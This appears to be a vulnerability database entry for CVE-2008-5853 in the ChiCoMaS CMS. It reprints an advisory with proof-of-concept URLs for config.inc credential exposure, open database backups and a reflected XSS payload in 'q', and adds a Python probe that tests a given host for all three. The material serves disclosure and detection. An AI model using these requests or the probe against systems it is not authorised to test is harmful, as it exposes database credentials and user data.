chicomas permission and access control vulnerability

Vulnerability ID 1117101 Vulnerability type Permission and access control
Published 2008-12-21 Updated 2009-01-06
CVE ID CVE-2008-5853 CNNVD ID CNNVD-200901-042
Platform PHP CVSS score 5.0
|Vulnerability sources
https://www.exploit-db.com/exploits/7532
https://www.securityfocus.com/bid/84642
https://cxsecurity.com/issue/WLB-2009010128
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-042
|Vulnerability details
Chilek Content Management System (also known as ChiCoMaS) is a content management system. ChiCoMaS 2.0.4 and earlier store sensitive files under the web root without adequate access control, which lets a remote attacker (1) obtain the database credentials with a direct request for config.inc, or (2) read database backup files with a direct request for the backup/ URI. Because config.inc uses the .inc extension, a web server that is not configured to hand .inc files to PHP serves the file as plain text, so the credentials it contains come back verbatim; the backup/ directory is readable in the same way whenever directory listing is enabled or a backup file name is known.
|Exploit
########################## www.BugReport.ir #########################
#
#      AmnPardaz Security Research Team
#
# Title:  chicomas <=2.0.4 Multiple Vulnerabilities
# Vendor: http://www.chicomas.com/
# Demo:   http://demo.opensourcecms.com/chicomas
# Bug:    Database Information Disclosure, Authorization Weakness, XSS
# Vulnerable Version: 2.0.4
# Exploitation: Remote with browser
# Fix: N/A
# Original Advisory: http://www.bugreport.ir/index_59.htm
###################################################################


####################
- Description:
####################

  ChiCoMaS is a free web-based Content Management System based on PHP & MySQL with a full-featured WYSIWYG TinyMCE editor,
file management with QuiXplorer, user and group administration to manage access permissions, and Backup/Restore with the integrated MySqlBackupPro.

####################
- Vulnerability:
####################

+-->Database Information Disclosure

POC: http://[URL]/chicomas/config.inc


+-->The latest generated database backups

POC: http://[URL]/chicomas/backup


+-->Cross Site Scripting (XSS). Reflected XSS in the "q" parameter of "index.php".

POC: http://[URL]/chicomas/index.php?q="<script>alert(/www.BugReport.ir/.source)</script>
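The three PoC URLs above are one-off browser requests. The following is an added example, not part of the AmnPardaz advisory or of ChiCoMaS itself: response classifiers for each of the three findings, plus a probe that runs them against an install with nothing more than GET requests. The example assumes that config.inc starts with a PHP open tag and assigns its credentials as $db_* variables or DB_* defines, that backup/ has no index page and so returns an autoindex-style listing of MySqlBackupPro dumps, and that index.php writes "q" back into the page unescaped; the sample responses embedded at the bottom are constructed to match those assumptions, not captured from a real host. The marker sent through "q" is inert and exists only to be recognised on reflection.

```python
import html
import re
import sys
import urllib.parse
import urllib.request

# Paths named in the advisory, relative to the ChiCoMaS install URL.
CONFIG_PATH = "config.inc"
BACKUP_PATH = "backup/"
XSS_PATH = "index.php"
XSS_PARAM = "q"
# Harmless marker reflected through "q"; its raw form cannot survive HTML escaping.
XSS_MARKER = '"><chicomas-xss-check>'

# A .inc file that the web server does not hand to PHP comes back as source.
# Assumption: the credentials are plain $db_* assignments or DB_* defines.
_PHP_TAG = re.compile(r"<\?php|<\?\s")
_DB_CRED = re.compile(
    r"\$\w*(?:db|mysql)\w*(?:user|pass|host|name)\w*\s*=|"
    r"define\s*\(\s*['\"]\w*(?:DB|MYSQL)\w*(?:USER|PASS|HOST|NAME)\w*['\"]",
    re.IGNORECASE,
)
# Assumption: backup/ has no index page, so the server returns an autoindex
# listing of MySqlBackupPro dumps (.sql, possibly compressed).
_AUTOINDEX = re.compile(r"Index of /", re.IGNORECASE)
_BACKUP_FILE = re.compile(r'href="([^"?/]+\.(?:sql|gz|zip|bz2))"', re.IGNORECASE)


def config_leaks_credentials(body):
    """True if a response body is PHP source containing database credentials."""
    return bool(_PHP_TAG.search(body)) and bool(_DB_CRED.search(body))


def backup_files_listed(body):
    """Names of backup files exposed in a directory listing, or [] if none."""
    if not _AUTOINDEX.search(body):
        return []
    return _BACKUP_FILE.findall(body)


def reflected_unescaped(body, marker=XSS_MARKER):
    """True if the marker came back verbatim (escaped output would alter < " >)."""
    return marker in body


def probe(base_url, fetch=None):
    """Run all three checks against one install; `fetch` is injectable for testing."""
    if fetch is None:
        def fetch(url):
            with urllib.request.urlopen(url, timeout=10) as resp:
                return resp.read().decode("utf-8", "replace")
    base = base_url if base_url.endswith("/") else base_url + "/"

    def get(url):
        try:
            return fetch(url)
        except Exception:  # 403/404/timeout: treat as not exposed
            return ""

    xss_url = base + XSS_PATH + "?" + urllib.parse.urlencode({XSS_PARAM: XSS_MARKER})
    return {
        "config_inc_exposed": config_leaks_credentials(get(base + CONFIG_PATH)),
        "backup_files": backup_files_listed(get(base + BACKUP_PATH)),
        "xss_reflected": reflected_unescaped(get(xss_url)),
    }


# Constructed sample responses (not captured from a real ChiCoMaS host).
SAMPLE_CONFIG = '<?php\n$db_host = "localhost";\n$db_user = "chicomas";\n$db_pass = "s3cret";\n?>\n'
SAMPLE_LISTING = (
    "<html><head><title>Index of /chicomas/backup</title></head><body>"
    '<a href="../">Parent Directory</a> <a href="db_2008-12-20.sql.gz">db_2008-12-20.sql.gz</a>'
    "</body></html>"
)
SAMPLE_XSS_PAGE = '<html><body><input name="q" value="' + XSS_MARKER + '"></body></html>'
SAMPLE_SAFE_PAGE = '<html><body><input name="q" value="' + html.escape(XSS_MARKER, quote=True) + '"></body></html>'


def _fake_fetch(url):
    """Offline stand-in for HTTP so probe() can run against the samples above."""
    if url.endswith(CONFIG_PATH):
        return SAMPLE_CONFIG
    if url.endswith(BACKUP_PATH):
        return SAMPLE_LISTING
    if XSS_PATH + "?" in url:
        return SAMPLE_XSS_PAGE
    raise ValueError("unexpected URL " + url)


def demo():
    """Probe the constructed samples; same dict shape probe() returns for a live host."""
    return probe("http://example.invalid/chicomas", fetch=_fake_fetch)


if __name__ == "__main__":
    print(probe(sys.argv[1]) if len(sys.argv) > 1 else demo())
```

Run it with the install URL as the only argument (`python3 probe.py http://host/chicomas/`) to get a dict of the three results; with no argument it runs against the embedded samples. Any error from the server (403, 404, timeout) is deliberately treated as "not exposed", so a hardened install reports all three checks clean rather than crashing the probe.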

####################
- Solution:
####################

Restrict access to these resources to trusted users only: keep config.inc and the backup directory outside the web root, or deny web access to them in the server configuration. Edit the source code so that the "q" parameter is HTML-encoded before it is written back into the page.

####################
- Credit :
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com

# milw0rm.com [2008-12-21]
|Affected products
ChiCoMaS ChiCoMas 2.0.4
ChiCoMaS ChiCoMas 2.0.3
|References

Source: BUGTRAQ
Name: 20081220 chicomas <=2.0.4 Multiple Vulnerabilities
Link: http://www.securityfocus.com/archive/1/archive/1/499458/100/0/threaded
Source: MILW0RM
Name: 7532
Link: http://www.milw0rm.com/exploits/7532
Source: MISC
Link: http://www.bugreport.ir/index_59.htm
Source: SREASON
Name: 4872
Link: http://securityreason.com/securityalert/4872
Source: SECUNIA
Name: 30080
Link: http://secunia.com/advisories/30080